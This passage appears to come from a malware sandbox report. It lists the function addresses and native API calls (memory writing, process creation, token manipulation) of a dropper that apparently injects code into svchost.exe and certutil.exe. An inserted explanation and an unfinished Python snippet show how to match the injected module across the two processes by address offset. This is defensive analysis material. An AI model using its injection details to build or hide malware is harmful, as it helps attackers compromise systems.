            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652BE0 NtQueryValueKey,LdrInitializeThunk,14_2_05652BE0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_05652BF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_05652BA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652AF0 NtWriteFile,LdrInitializeThunk,14_2_05652AF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652AD0 NtReadFile,LdrInitializeThunk,14_2_05652AD0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056535C0 NtCreateMutant,LdrInitializeThunk,14_2_056535C0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_056539B0 NtGetContextThread,LdrInitializeThunk,14_2_056539B0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652D00 NtSetInformationFile,14_2_05652D00
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652DB0 NtEnumerateKey,14_2_05652DB0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652C00 NtQueryInformationProcess,14_2_05652C00
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652CF0 NtOpenProcess,14_2_05652CF0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652CC0 NtQueryVirtualMemory,14_2_05652CC0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652F60 NtCreateProcessEx,14_2_05652F60
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652FA0 NtQuerySection,14_2_05652FA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652F90 NtProtectVirtualMemory,14_2_05652F90
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652E30 NtWriteVirtualMemory,14_2_05652E30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652EA0 NtAdjustPrivilegesToken,14_2_05652EA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652B80 NtQueryInformationFile,14_2_05652B80
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05652AB0 NtWaitForSingleObject,14_2_05652AB0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653010 NtOpenDirectoryObject,14_2_05653010
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653090 NtSetValueKey,14_2_05653090
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653D70 NtOpenThread,14_2_05653D70
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_05653D10 NtOpenProcessToken,14_2_05653D10
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C80F0 NtAllocateVirtualMemory,14_2_032C80F0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7F10 NtDeleteFile,14_2_032C7F10
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7FA0 NtClose,14_2_032C7FA0
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7E30 NtReadFile,14_2_032C7E30
            Source: C:\Windows\SysWOW64\certutil.exeCode function: 14_2_032C7CD0 NtCreateFile,14_2_032C7CD0
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_006F4021
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006E8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_006E8858
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_006F545F
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0069E8000_2_0069E800
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BDBB50_2_006BDBB5
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0069E0600_2_0069E060
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0071804A0_2_0071804A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A41400_2_006A4140
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B24050_2_006B2405
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C65220_2_006C6522
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C267E0_2_006C267E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_007106650_2_00710665
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A68430_2_006A6843
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B283A0_2_006B283A
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C89DF0_2_006C89DF
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A8A0E0_2_006A8A0E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_00710AE20_2_00710AE2
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C6A940_2_006C6A94
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006EEB070_2_006EEB07
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006F8B130_2_006F8B13
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BCD610_2_006BCD61
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C70060_2_006C7006
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A710E0_2_006A710E
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A31900_2_006A3190
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006912870_2_00691287
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B33C70_2_006B33C7
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BF4190_2_006BF419
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B16C40_2_006B16C4
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A56800_2_006A5680
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006A58C00_2_006A58C0
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B78D30_2_006B78D3
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B1BB80_2_006B1BB8
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006C9D050_2_006C9D05
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_0069FE400_2_0069FE40
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006BBFE60_2_006BBFE6
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_006B1FD00_2_006B1FD0
            Source: C:\Users\user\Desktop\Documente de expediere.exeCode function: 0_2_015436700_2_01543670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041688E2_2_0041688E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168932_2_00416893
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010B92_2_004010B9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031502_2_00403150
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101632_2_00410163
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1E32_2_0040E1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012502_2_00401250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024D02_2_004024D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015402_2_00401540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF432_2_0040FF43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7D32_2_0042D7D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFCF2
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_031078AF
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_0310790A
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_0310790E
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_0310988A
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_0310FFB5
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_0310FFBA
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_0310966A
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Code function: 13_2_03126EFA
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05620535
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056E0591
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D2446
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056C4420
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056CE4F6
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05620770
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05644750
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0561C7C0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0563C6E0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056A8158
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05610100
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056BA118
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D81CC
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056E01AA
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D41A2
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056B2000
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DA352
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056E03E6
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0562E3F0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056C0274
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056A02C0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0562AD00
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056BCD1F
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0561ADE0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05638DBF
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05620C00
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05610CF2
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056C0CB5
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05694F40
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05662F28
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05640F30
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056C2F30
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0562CFE0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05612FC8
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0569EFA0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05620E59
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DEE26
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DEEDB
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05632E90
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DCE93
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05636962
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056229A0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056EA9A6
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05622840
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0562A840
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0564E8F0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056068B8
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DAB40
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D6BD7
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0561EA80
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D7571
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056E95C3
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056BD5B0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05611460
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DF43F
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DF7B0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05665630
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D16CC
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056EB16B
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0565516C
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0560F172
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0562B1B0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D70E9
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DF0E0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056CF0CC
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056270C0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0560D34C
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D132D
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0566739A
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056C12ED
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0563B2C0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056252A0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D7D73
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05623D40
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D1D5A
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0563FDC0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05699C32
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DFCF2
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DFF09
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_055E3FD5
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_055E3FD2
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DFFB1
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05621F92
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05629EB0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05629950
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0563B950
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056B5910
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0568D800
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056238E0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DFB76
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05695BF0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0565DBF9
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0563FB80
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05693A6C
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056DFA49
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D7A46
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056CDAC6
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05665AA0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056BDAAC
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056C1AA3
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032B1960
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032CA3D0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032ACB40
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032ACD60
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032AADE0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032B348B
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032B3490
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543C07C
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543B0E8
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543C086
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543A3FB
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543BCE3
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543BE4C
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543BBC4
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 0569F290 appears 105 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 05667E54 appears 111 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 05655130 appears 58 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 0560B970 appears 277 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 0568EA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 111 times
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: String function: 00697F41 appears 35 times
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: String function: 006B0D27 appears 70 times
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: String function: 006B8B40 appears 42 times
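The two address columns above are worth checking against each other before trusting the "same family in two processes" story. Every svchost.exe function start (2_2_...) reappears in certutil.exe (14_2_...) at a constant offset, and the five "String function" addresses with identical hit counts (86, 277, 105, 58, 111) line up the same way, which is what one injected module mapped at two different bases looks like. The Python below is an added example, not part of the Joe Sandbox report: it parses a subset of the rows above (copied from the report, in the "Source ... | Code function ..." form) and recovers the base delta that maps one process's function starts onto the other's. The row format and the process image names are the only assumptions.

```python
import re
from collections import Counter, defaultdict

# Rows copied from the report's "Code function" / "String function" listing
# for svchost.exe (PID 2), certutil.exe (PID 14) and the dropper (PID 0).
# Two certutil.exe rows from unrelated regions (032B..., 0543...) are kept so
# the comparison is not trivially one-to-one.
REPORT_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
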